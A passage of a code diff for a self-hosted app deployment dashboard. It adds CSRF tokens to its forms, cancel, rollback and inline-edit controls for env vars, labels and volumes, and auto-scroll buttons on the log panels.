+      return diffDay + (diffDay === 1 ? " day ago" : " days ago");
+    return date.toLocaleDateString();
+  },
+  // Placeholder functions - templates should migrate to Alpine.js
+  initAppDetailPage() {},
+  initDeploymentsPage() {},
+};
+
+// Update relative times on page load for non-Alpine elements
+document.addEventListener("DOMContentLoaded", () => {
+  document.querySelectorAll(".relative-time[data-time]").forEach((el) => {
+    const time = el.getAttribute("data-time");
+    if (time) {
+      el.textContent = window.upaas.formatRelativeTime(time);
+    }
+  });
+});

templates/app_detail.html

@@ -35,10 +35,21 @@
         <div class="flex gap-3">
             <a href="/apps/{{.App.ID}}/edit" class="btn-secondary">Edit</a>
             <form method="POST" action="/apps/{{.App.ID}}/deploy" class="inline" @submit="submitDeploy()">
+                {{ .CSRFField }}
                 <button type="submit" class="btn-success" x-bind:disabled="deploying" x-bind:class="{ 'opacity-50 cursor-not-allowed': deploying }">
                     <span x-text="deploying ? 'Deploying...' : 'Deploy Now'"></span>
                 </button>
             </form>
+            <form method="POST" action="/apps/{{.App.ID}}/deployments/cancel" class="inline" x-show="deploying" x-cloak x-data="confirmAction('Cancel the current deployment?')" @submit="confirm($event)">
+                {{ .CSRFField }}
+                <button type="submit" class="btn-danger">Cancel Deploy</button>
+            </form>
+            {{if .App.PreviousImageID.Valid}}
+            <form method="POST" action="/apps/{{.App.ID}}/rollback" class="inline" x-data="confirmAction('Roll back to the previous deployment?')" @submit="confirm($event)">
+                {{ .CSRFField }}
+                <button type="submit" class="btn-warning">Rollback</button>
+            </form>
+            {{end}}
         </div>
     </div>
 
@@ -101,14 +112,34 @@
                 </thead>
                 <tbody class="table-body">
                     {{range .EnvVars}}
-                    <tr>
+                    <tr x-data="{ editing: false }">
-                        <td class="font-mono font-medium">{{.Key}}</td>
+                        <template x-if="!editing">
-                        <td class="font-mono text-gray-500">{{.Value}}</td>
+                            <td class="font-mono font-medium">{{.Key}}</td>
-                        <td class="text-right">
+                        </template>
-                            <form method="POST" action="/apps/{{$.App.ID}}/env/{{.ID}}/delete" class="inline" x-data="confirmAction('Delete this environment variable?')" @submit="confirm($event)">
+                        <template x-if="!editing">
-                                <button type="submit" class="text-error-500 hover:text-error-700 text-sm">Delete</button>
+                            <td class="font-mono text-gray-500">{{.Value}}</td>
-                            </form>
+                        </template>
-                        </td>
+                        <template x-if="!editing">
+                            <td class="text-right">
+                                <button @click="editing = true" class="text-primary-600 hover:text-primary-800 text-sm mr-2">Edit</button>
+                                <form method="POST" action="/apps/{{$.App.ID}}/env-vars/{{.ID}}/delete" class="inline" x-data="confirmAction('Delete this environment variable?')" @submit="confirm($event)">
+                                    {{ $.CSRFField }}
+                                    <button type="submit" class="text-error-500 hover:text-error-700 text-sm">Delete</button>
+                                </form>
+                            </td>
+                        </template>
+                        <template x-if="editing">
+                            <td colspan="3">
+                                <form method="POST" action="/apps/{{$.App.ID}}/env-vars/{{.ID}}/edit" class="flex gap-2 items-center">
+                                    {{ $.CSRFField }}
+                                    <input type="text" name="key" value="{{.Key}}" required class="input flex-1 font-mono text-sm">
+                                    <input type="text" name="value" value="{{.Value}}" required class="input flex-1 font-mono text-sm">
+                                    <button type="submit" class="btn-primary text-sm">Save</button>
+                                    <button type="button" @click="editing = false" class="text-gray-500 hover:text-gray-700 text-sm">Cancel</button>
+                                </form>
+                                <p class="text-xs text-amber-600 mt-1">⚠ Container restart needed after env var changes.</p>
+                            </td>
+                        </template>
                     </tr>
                     {{end}}
                 </tbody>
@@ -116,6 +147,7 @@
         </div>
         {{end}}
         <form method="POST" action="/apps/{{.App.ID}}/env" class="flex flex-col sm:flex-row gap-2">
+                {{ .CSRFField }}
             <input type="text" name="key" placeholder="KEY" required class="input flex-1 font-mono text-sm">
             <input type="text" name="value" placeholder="value" required class="input flex-1 font-mono text-sm">
             <button type="submit" class="btn-primary">Add</button>
@@ -144,20 +176,40 @@
                         </td>
                     </tr>
                     {{range .Labels}}
-                    <tr>
+                    <tr x-data="{ editing: false }">
-                        <td class="font-mono font-medium">{{.Key}}</td>
+                        <template x-if="!editing">
-                        <td class="font-mono text-gray-500">{{.Value}}</td>
+                            <td class="font-mono font-medium">{{.Key}}</td>
-                        <td class="text-right">
+                        </template>
-                            <form method="POST" action="/apps/{{$.App.ID}}/labels/{{.ID}}/delete" class="inline" x-data="confirmAction('Delete this label?')" @submit="confirm($event)">
+                        <template x-if="!editing">
-                                <button type="submit" class="text-error-500 hover:text-error-700 text-sm">Delete</button>
+                            <td class="font-mono text-gray-500">{{.Value}}</td>
-                            </form>
+                        </template>
-                        </td>
+                        <template x-if="!editing">
+                            <td class="text-right">
+                                <button @click="editing = true" class="text-primary-600 hover:text-primary-800 text-sm mr-2">Edit</button>
+                                <form method="POST" action="/apps/{{$.App.ID}}/labels/{{.ID}}/delete" class="inline" x-data="confirmAction('Delete this label?')" @submit="confirm($event)">
+                                    {{ $.CSRFField }}
+                                    <button type="submit" class="text-error-500 hover:text-error-700 text-sm">Delete</button>
+                                </form>
+                            </td>
+                        </template>
+                        <template x-if="editing">
+                            <td colspan="3">
+                                <form method="POST" action="/apps/{{$.App.ID}}/labels/{{.ID}}/edit" class="flex gap-2 items-center">
+                                    {{ $.CSRFField }}
+                                    <input type="text" name="key" value="{{.Key}}" required class="input flex-1 font-mono text-sm">
+                                    <input type="text" name="value" value="{{.Value}}" required class="input flex-1 font-mono text-sm">
+                                    <button type="submit" class="btn-primary text-sm">Save</button>
+                                    <button type="button" @click="editing = false" class="text-gray-500 hover:text-gray-700 text-sm">Cancel</button>
+                                </form>
+                            </td>
+                        </template>
                     </tr>
                     {{end}}
                 </tbody>
             </table>
         </div>
         <form method="POST" action="/apps/{{.App.ID}}/labels" class="flex flex-col sm:flex-row gap-2">
+                {{ .CSRFField }}
             <input type="text" name="key" placeholder="label.key" required class="input flex-1 font-mono text-sm">
             <input type="text" name="value" placeholder="value" required class="input flex-1 font-mono text-sm">
             <button type="submit" class="btn-primary">Add</button>
@@ -180,21 +232,46 @@
                 </thead>
                 <tbody class="table-body">
                     {{range .Volumes}}
-                    <tr>
+                    <tr x-data="{ editing: false }">
-                        <td class="font-mono">{{.HostPath}}</td>
+                        <template x-if="!editing">
-                        <td class="font-mono">{{.ContainerPath}}</td>
+                            <td class="font-mono">{{.HostPath}}</td>
-                        <td>
+                        </template>
-                            {{if .ReadOnly}}
+                        <template x-if="!editing">
-                            <span class="badge-neutral">Read-only</span>
+                            <td class="font-mono">{{.ContainerPath}}</td>
-                            {{else}}
+                        </template>
-                            <span class="badge-info">Read-write</span>
+                        <template x-if="!editing">
-                            {{end}}
+                            <td>
-                        </td>
+                                {{if .ReadOnly}}
-                        <td class="text-right">
+                                <span class="badge-neutral">Read-only</span>
-                            <form method="POST" action="/apps/{{$.App.ID}}/volumes/{{.ID}}/delete" class="inline" x-data="confirmAction('Delete this volume mount?')" @submit="confirm($event)">
+                                {{else}}
-                                <button type="submit" class="text-error-500 hover:text-error-700 text-sm">Delete</button>
+                                <span class="badge-info">Read-write</span>
-                            </form>
+                                {{end}}
-                        </td>
+                            </td>
+                        </template>
+                        <template x-if="!editing">
+                            <td class="text-right">
+                                <button @click="editing = true" class="text-primary-600 hover:text-primary-800 text-sm mr-2">Edit</button>
+                                <form method="POST" action="/apps/{{$.App.ID}}/volumes/{{.ID}}/delete" class="inline" x-data="confirmAction('Delete this volume mount?')" @submit="confirm($event)">
+                                    {{ $.CSRFField }}
+                                    <button type="submit" class="text-error-500 hover:text-error-700 text-sm">Delete</button>
+                                </form>
+                            </td>
+                        </template>
+                        <template x-if="editing">
+                            <td colspan="4">
+                                <form method="POST" action="/apps/{{$.App.ID}}/volumes/{{.ID}}/edit" class="flex gap-2 items-center">
+                                    {{ $.CSRFField }}
+                                    <input type="text" name="host_path" value="{{.HostPath}}" required class="input flex-1 font-mono text-sm" placeholder="/host/path">
+                                    <input type="text" name="container_path" value="{{.ContainerPath}}" required class="input flex-1 font-mono text-sm" placeholder="/container/path">
+                                    <label class="flex items-center gap-1 text-sm text-gray-600 whitespace-nowrap">
+                                        <input type="checkbox" name="readonly" value="1" {{if .ReadOnly}}checked{{end}} class="rounded border-gray-300 text-primary-600 focus:ring-primary-500">
+                                        RO
+                                    </label>
+                                    <button type="submit" class="btn-primary text-sm">Save</button>
+                                    <button type="button" @click="editing = false" class="text-gray-500 hover:text-gray-700 text-sm">Cancel</button>
+                                </form>
+                            </td>
+                        </template>
                     </tr>
                     {{end}}
                 </tbody>
@@ -202,6 +279,7 @@
         </div>
         {{end}}
         <form method="POST" action="/apps/{{.App.ID}}/volumes" class="flex flex-col sm:flex-row gap-2 items-end">
+                {{ .CSRFField }}
             <div class="flex-1 w-full">
                 <input type="text" name="host_path" placeholder="/host/path" required class="input font-mono text-sm">
             </div>
@@ -244,6 +322,7 @@
                         </td>
                         <td class="text-right">
                             <form method="POST" action="/apps/{{$.App.ID}}/ports/{{.ID}}/delete" class="inline" x-data="confirmAction('Delete this port mapping?')" @submit="confirm($event)">
+                {{ .CSRFField }}
                                 <button type="submit" class="text-error-500 hover:text-error-700 text-sm">Delete</button>
                             </form>
                         </td>
@@ -254,6 +333,7 @@
         </div>
         {{end}}
         <form method="POST" action="/apps/{{.App.ID}}/ports" class="flex flex-col sm:flex-row gap-2 items-end">
+                {{ .CSRFField }}
             <div class="flex-1 w-full">
                 <label class="block text-xs text-gray-500 mb-1">Host (external)</label>
                 <input type="text" name="host_port" placeholder="8080" required pattern="[0-9]+" class="input font-mono text-sm">
@@ -279,8 +359,17 @@
             <h2 class="section-title">Container Logs</h2>
             <span x-bind:class="containerStatusBadgeClass" x-text="containerStatusLabel"></span>
         </div>
-        <div x-ref="containerLogsWrapper" class="bg-gray-900 rounded-lg p-4 overflow-auto" style="max-height: 400px;">
+        <div class="relative">
-            <pre class="text-gray-100 text-xs font-mono whitespace-pre-wrap" x-text="containerLogs"></pre>
+            <div x-ref="containerLogsWrapper" class="bg-gray-900 rounded-lg p-4 overflow-y-auto" style="max-height: 400px;">
+                <pre class="text-gray-100 text-xs font-mono whitespace-pre-wrap break-words m-0" x-text="containerLogs"></pre>
+            </div>
+            <button
+                x-show="!_containerAutoScroll"
+                x-transition
+                @click="_containerAutoScroll = true; Alpine.store('utils').scrollToBottom($refs.containerLogsWrapper)"
+                class="absolute bottom-2 right-4 bg-primary-600 hover:bg-primary-700 text-white text-xs px-3 py-1 rounded-full shadow-lg opacity-90 hover:opacity-100 transition"
+                title="Scroll to bottom"
+            >↓ Follow</button>
         </div>
     </div>
 
@@ -329,8 +418,17 @@
             <h2 class="section-title">Last Deployment Build Logs</h2>
             <span x-bind:class="buildStatusBadgeClass" x-text="buildStatusLabel"></span>
         </div>
-        <div x-ref="buildLogsWrapper" class="bg-gray-900 rounded-lg p-4 overflow-auto" style="max-height: 400px;">
+        <div class="relative">
-            <pre class="text-gray-100 text-xs font-mono whitespace-pre-wrap" x-text="buildLogs"></pre>
+            <div x-ref="buildLogsWrapper" class="bg-gray-900 rounded-lg p-4 overflow-y-auto" style="max-height: 400px;">
+                <pre class="text-gray-100 text-xs font-mono whitespace-pre-wrap break-words m-0" x-text="buildLogs"></pre>
+            </div>
+            <button
+                x-show="!_buildAutoScroll"
+                x-transition
+                @click="_buildAutoScroll = true; Alpine.store('utils').scrollToBottom($refs.buildLogsWrapper)"
+                class="absolute bottom-2 right-4 bg-primary-600 hover:bg-primary-700 text-white text-xs px-3 py-1 rounded-full shadow-lg opacity-90 hover:opacity-100 transition"
+                title="Scroll to bottom"
+            >↓ Follow</button>
         </div>
     </div>
 
@@ -339,6 +437,7 @@
         <h2 class="text-lg font-medium text-error-700 mb-4">Danger Zone</h2>
         <p class="text-error-600 text-sm mb-4">Deleting this app will remove all configuration and deployment history. This action cannot be undone.</p>
         <form method="POST" action="/apps/{{.App.ID}}/delete" x-data="confirmAction('Are you sure you want to delete this app? This action cannot be undone.')" @submit="confirm($event)">
+                {{ .CSRFField }}
             <button type="submit" class="btn-danger">Delete App</button>
         </form>
     </div>

templates/app_edit.html

@@ -21,6 +21,7 @@
         {{template "alert-error" .}}
 
         <form method="POST" action="/apps/{{.App.ID}}" class="space-y-6">
+                {{ .CSRFField }}
             <div class="form-group">
                 <label for="name" class="label">App Name</label>
                 <input

templates/app_new.html

@@ -21,6 +21,7 @@
         {{template "alert-error" .}}
 
         <form method="POST" action="/apps" class="space-y-6">
+                {{ .CSRFField }}
             <div class="form-group">
                 <label for="name" class="label">App Name</label>
                 <input

templates/base.html

@@ -15,7 +15,11 @@
     </div>
     {{template "footer" .}}
     <script defer src="/s/js/alpine.min.js"></script>
-    <script src="/s/js/app.js"></script>
+    <script src="/s/js/utils.js"></script>
+    <script src="/s/js/components.js"></script>
+    <script src="/s/js/app-detail.js"></script>
+    <script src="/s/js/deployment.js"></script>
+    <script src="/s/js/dashboard.js"></script>
 </body>
 </html>
 {{end}}
@@ -32,6 +36,7 @@
                 New App
             </a>
             <form method="POST" action="/logout" class="inline">
+                {{ .CSRFField }}
                 <button type="submit" class="btn-text">Logout</button>
             </form>
         </div>

templates/dashboard.html

@@ -69,6 +69,7 @@
                             <a href="/apps/{{.App.ID}}" class="btn-text text-sm py-1 px-2">View</a>
                             <a href="/apps/{{.App.ID}}/edit" class="btn-secondary text-sm py-1 px-2">Edit</a>
                             <form method="POST" action="/apps/{{.App.ID}}/deploy" class="inline">
+                {{ $.CSRFField }}
                                 <button type="submit" class="btn-success text-sm py-1 px-2">Deploy</button>
                             </form>
                         </div>

templates/deployments.html

@@ -18,6 +18,7 @@
     <div class="section-header">
         <h1 class="text-2xl font-medium text-gray-900">Deployment History</h1>
         <form method="POST" action="/apps/{{.App.ID}}/deploy" @submit="submitDeploy()">
+                {{ .CSRFField }}
             <button type="submit" class="btn-success" x-bind:disabled="isDeploying" x-bind:class="{ 'opacity-50 cursor-not-allowed': isDeploying }">
                 <span x-text="isDeploying ? 'Deploying...' : 'Deploy Now'"></span>
             </button>
@@ -85,10 +86,19 @@
                     </a>
                     {{end}}
                 </div>
-                <div x-ref="logsWrapper" class="bg-gray-900 rounded-lg p-4 overflow-auto" style="max-height: 400px;">
+                <div class="relative">
-                    <pre class="text-gray-100 text-xs font-mono whitespace-pre-wrap" x-text="logs"></pre>
+                    <div x-ref="logsWrapper" class="bg-gray-900 rounded-lg p-4 overflow-y-auto" style="max-height: 400px;">
+                        <pre class="text-gray-100 text-xs font-mono whitespace-pre-wrap break-words m-0" x-text="logs"></pre>
+                    </div>
+                    <button
+                        x-show="!_autoScroll"
+                        x-transition
+                        @click="_autoScroll = true; Alpine.store('utils').scrollToBottom($refs.logsWrapper)"
+                        class="absolute bottom-2 right-4 bg-primary-600 hover:bg-primary-700 text-white text-xs px-3 py-1 rounded-full shadow-lg opacity-90 hover:opacity-100 transition"
+                        title="Scroll to bottom"
+                    >↓ Follow</button>
                 </div>
-                {{if .Logs.Valid}}<script type="text/plain" class="initial-logs">{{.Logs.String}}</script>{{end}}
+                {{if .Logs.Valid}}<div hidden class="initial-logs" data-logs="{{.Logs.String}}"></div>{{end}}
             </div>
             {{end}}
         </div>
@@ -103,6 +113,7 @@
                 <p class="empty-state-description">Deploy your application to see the deployment history here.</p>
                 <div class="mt-6">
                     <form method="POST" action="/apps/{{.App.ID}}/deploy" @submit="submitDeploy()">
+                {{ .CSRFField }}
                         <button type="submit" class="btn-success" x-bind:disabled="isDeploying" x-bind:class="{ 'opacity-50 cursor-not-allowed': isDeploying }">
                             <span x-text="isDeploying ? 'Deploying...' : 'Deploy Now'"></span>
                         </button>

templates/login.html

@@ -14,6 +14,7 @@
             {{template "alert-error" .}}
 
             <form method="POST" action="/login" class="space-y-6">
+                {{ .CSRFField }}
                 <div class="form-group">
                     <label for="username" class="label">Username</label>
                     <input

templates/setup.html

@@ -14,6 +14,7 @@
             {{template "alert-error" .}}
 
             <form method="POST" action="/setup" class="space-y-6">
+                {{ .CSRFField }}
                 <div class="form-group">
                     <label for="username" class="label">Username</label>
                     <input